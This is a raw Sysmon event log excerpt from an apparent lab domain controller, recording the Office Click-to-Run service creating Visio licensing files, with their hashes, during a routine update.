Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProMSDNR_Retail-ppd.xrm-msMD5=73BF1D05148B10C644918581F0324265,SHA256=0BB8C5C8D62BC69165BAB11A5B49AA744C18BE7B69CC3D01E9067712DFA823DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067959Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProMSDNR_Retail-pl.xrm-msMD5=95069F65A914E29AFDE14555D5A5FD8D,SHA256=4D04F28D2C8EBD374CFC143A5ED90117AA565E5CE5A2A28EAFA4C6FF96A5B743,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067958Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProDemoR_BypassTrial180-ul-oob.xrm-msMD5=D569F546D135668CF1CFE6021C9A00D7,SHA256=E3D7309C84CC243AC1ECA61DDEB50F17A7C3FC897F8EA957F0484E0EDBB8E175,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067957Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProDemoR_BypassTrial180-ppd.xrm-msMD5=0499909F0F977B4C43A783B8D1C42B81,SHA256=D1903C08C438976CCCC8F4904019B8EECAF88D085F40F7D829D2B2B638532692,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067956Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProCO365R_SubTrial-ul-oob.xrm-msMD5=15C25AD221EE1544E69AF742DA2D7B04,SHA256=106D3D32A3AA071097F8D544AE09C5D7C5FFD0A09C3FA4B1CD554EB324C09051,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067955Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProCO365R_SubTrial-ppd.xrm-msMD5=3CB24E7145D24E8F6ECF4728AC9DF20E,SHA256=F90CBE36D78A655EA6D18E775EE45E6C588A6A53B56B4FFB00255E66EFF14E55,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067954Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProCO365R_SubTrial-pl.xrm-msMD5=74EC30359804E99BAF89540F539F4D3E,SHA256=0D27D832D887874DCA911EEDBC8BE90E234E81EEFE461719383BA6D7D24E496C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067953Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProCO365R_SubTest-ul-oob.xrm-msMD5=E687DBFFB102EF4E9E9033CF0DB5758E,SHA256=2B49B32D5E226CAE998E24911A97C655CC63114F96CCB607B1B860D97A6BC5ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067952Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProCO365R_SubTest-ppd.xrm-msMD5=B1DC1D371370F743F9664D3AA25F259F,SHA256=8468B258BE3B9ED151C005BE138C7B02A126E635218AC14C4A67E29622025AA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067951Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProCO365R_SubTest-pl.xrm-msMD5=68C7CCBCD5E6E54F84A4BB6FF6E06470,SHA256=2490F5961795EA840F3D6F9B937DA5D6C0240ECE8E88EA5893482C09EA7C4111,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067950Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProCO365R_Subscription-ul-oob.xrm-msMD5=DE3AF1B2C7DE19CE0188AD92F77E9463,SHA256=4DD86E77A1BB7C0FCB1F3D7612180271B662DBA56C367ED7867B6426B20E3CED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067949Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProCO365R_Subscription-ppd.xrm-msMD5=5D4F45E701602AF366C165E54A5B5DAC,SHA256=2B9D9F2D220BCE92D450C34CF01018F267E3B20636531C8644A8D0626E06CE1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067948Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProCO365R_Subscription-pl.xrm-msMD5=4E26650C168DEFEAB6D2F94BEAF4EA17,SHA256=164ADEB79E5D44F81C8EDB1B1F94325B37D9A38AFDB51274C1EC4C859676AFE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067947Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioPro2019XC2RVL_MAKC2R-ul-phn.xrm-msMD5=0AA6C63A4DFF04696AC9BAA6AA357CE6,SHA256=435BAE33BA9A6131B53F2C5813C54715D274BC6854E17CAB16C67918148BEC04,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067946Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioPro2019XC2RVL_MAKC2R-ul-oob.xrm-msMD5=B4B506111D409E9AF4643E526DBD1D26,SHA256=A32B94A780AA615D9964D782ACEBF12CB4527C9F9CA4E63FBDA3F3CA8BA66B79,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067945Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioPro2019XC2RVL_MAKC2R-ppd.xrm-msMD5=153BD635DD895D21E09D08B705998741,SHA256=FF911EC68B83E2F83842627782367586645D0309387FB3F50A91DF08D46DB56F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067944Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioPro2019XC2RVL_MAKC2R-pl.xrm-msMD5=F8024EA4CA2A8377D1B5FCD4F21B0351,SHA256=D8A8DBFCB443313B4C709B664D8558415C2CB7B15F36205F14F3FE608E17B8CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067943Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioPro2019XC2RVL_KMS_ClientC2R-ul.xrm-msMD5=F45F104DA71E50C465C0E5B31CC7189A,SHA256=21405F0E83EDA69C7A47C5B8C9ABD4E69547FF857ADAD4792816D203D601507F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067942Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioPro2019XC2RVL_KMS_ClientC2R-ul-oob.xrm-msMD5=21453579B7EB748F2130D72762AE0A26,SHA256=1D12464BEF4FD068910EA5D674F4D1E33BFFA90EEF4CCF7BEDB43F2ED0DAF0CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067941Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioPro2019XC2RVL_KMS_ClientC2R-ppd.xrm-msMD5=662A300C5469F2C26188152D27939B55,SHA256=C35847C65A01CED4F5EEE0F98BEF57D4F06BB77E83A342EB07B7AEDCDF490F98,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067940Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioPro2019VL_MAK_AE-ul-phn.xrm-msMD5=76B158B3085B077AAB95BA14A8BE76A1,SHA256=9DDB0977B429D4DAF2BA936CA3DF353407EAF7726D79A3491F40670048782610,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067939Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioPro2019VL_MAK_AE-ul-oob.xrm-msMD5=03CA3026C12E0BBC9D6499029E95F803,SHA256=992D791A76F6E9CA337AEADDC2FB64A31A6682CFEDA1EECA05D8CC818768144B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067938Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioPro2019VL_MAK_AE-ppd.xrm-msMD5=87FDB89C84A20FCC77C401E22E604891,SHA256=10098821DB946C97625AEBA423A24242133493CAF804FCCCFCD2F9CABBA931D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067937Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioPro2019VL_MAK_AE-pl.xrm-msMD5=254DB7557B22FD09B22FDD7CFB6E019D,SHA256=4E28A1E98980BF1ADA03D05965CD47E84B483D570268F0089331D3D2EDC99FB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067936Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioPro2019VL_KMS_Client_AE-ul.xrm-msMD5=E50722DDE6C0571A2E28FA68DA43D043,SHA256=4ACB5E26932A08CB14F310962825CDFE3C3E0DB4D2E6457036900E1AA8A066A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067935Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioPro2019VL_KMS_Client_AE-ul-oob.xrm-msMD5=590E63AD4F0EC0FDF8B6190E5282630A,SHA256=E64B073D3969DB45763C3DF530834F249B172C02F50330BF0BB98F5F10323B29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067934Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioPro2019VL_KMS_Client_AE-ppd.xrm-msMD5=E714126546D3D1D658F13F9D8D02CBB6,SHA256=397B1B892C346D64C7C282D743D8EFAF31DE1B9A72B04705AB9E99FA760BB02B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067933Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioPro2019R_Trial-ul-oob.xrm-msMD5=C9EE715C4176F65AEA5153DF49286818,SHA256=B8C94300DF8C8FF150D2F3255FD713C4E877A03758E38FCA4A346BFD0611E0CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067932Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioPro2019R_Trial-ppd.xrm-msMD5=7BB85858F03A491514D43159D87037AF,SHA256=9C771024D99C5C7558DFE21A963306EB0F47ABE8EB380A81F21BFC4DD498DB8B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067931Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioPro2019R_Trial-pl.xrm-msMD5=DF0722AE7AB3033034921BFA37BCB13D,SHA256=0C0597E79EFAC941F1FA11CD812401BD9CDEDE60EFA29CF48B5C04B43CFF7F9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067930Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioPro2019R_Retail-ul-phn.xrm-msMD5=27071988D9A56781B992F98DAA617196,SHA256=A9F86BAAB3CC7B17FF582484480AD1F5B2F12B9DFEB6CF7FB929E04B98757233,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067929Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioPro2019R_Retail-ul-oob.xrm-msMD5=8F08B7803DC4FA218AFE5535A80C5AF3,SHA256=93A44BCB1D288B38A3EE4E7DA06B82C5F04852F1A581ADAD4153E22F835A9D5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067928Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioPro2019R_Retail-ppd.xrm-msMD5=C3DD39ED7FF43770A8731F5642FA1D6C,SHA256=407DE452D3094165AEFD08F0FC146660AF36DA2E591F0AD6DBD63DB8CFE273B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067927Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioPro2019R_Retail-pl.xrm-msMD5=01B8C32E15A4B21D6B5C5E32838E2E4D,SHA256=2591992728BAB28766642A2E01A42198B5DEFF4AFC9FCAB1D268F903BCEB3316,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067926Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioPro2019R_PrepidBypass-ul-oob.xrm-msMD5=ECD2454A86322531B5A8A2A0F206EC44,SHA256=527F9111EFB559BB95FE2EE28C18DE3863CB1149F90C7222583652570AFED28C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067925Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioPro2019R_PrepidBypass-ppd.xrm-msMD5=933770EFDF6CC79FD3A85DAC137D3F53,SHA256=65B075D7A9AE47FB532DD7BD298CEAB463A45514432E4B6463414A66D04DA771,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067924Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioPro2019R_OEM_Perp-ul-phn.xrm-msMD5=EE4AE29F1F0F7E202468495FD3060606,SHA256=AB5C8E56BEB9645253C1A31F9A2921C4DF141EB05C84E57FC593F25F2EA97CE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067923Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioPro2019R_OEM_Perp-ul-oob.xrm-msMD5=2CA544A498E644D7A251E9F9986F5D93,SHA256=2C852F3C722D46EFF132C396CDC7264357DC077819E708B5535BDB28326DD983,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067922Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioPro2019R_OEM_Perp-ppd.xrm-msMD5=66DCD1079320D5A734C184869F71CED3,SHA256=606DD18A8B7F9A14124F13FEDAC3AF014C853AD8B567069CB3BDC0584FBA1A1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067921Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioPro2019R_OEM_Perp-pl.xrm-msMD5=1AA89A40C6B82D246E826854CA9DE657,SHA256=3C5E2B6D14354B28D2FC6B7314801F452B07EB016703BD64D3D77A7D622D079E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067920Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioPro2019R_Grace-ul-oob.xrm-msMD5=A6F7475B9870B670B41726D09A466ED7,SHA256=B4504B800D26374B54F4B7A4B0632A91CD381AE713EAA1D36F844F05CC93C242,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067919Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioPro2019R_Grace-ppd.xrm-msMD5=A59EA686ACA8B7F13BE2FCF2149E7C3C,SHA256=D8C59E969ACA3CF3E0AE74BA61AA6BB1A6997D5F2A2D5ED1F229BB3590530D27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067918Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioPro2019MSDNR_Retail-ul-phn.xrm-msMD5=7892BDAABA1B6E5C32B76CF03C14516B,SHA256=1C09A07FDCD0B91B2626F5982D2E2EA2675369AF9C28001CE6D165872F7AE939,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067917Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioPro2019MSDNR_Retail-ul-oob.xrm-msMD5=3CBD435BB9AF079AA68BF721CBD1E5A7,SHA256=D2CB316F51CD34932283E33C42147333599225E3CFC70810D7DB218E0641448D,IMPHASH=00000000000000000000000000000000falsetrue 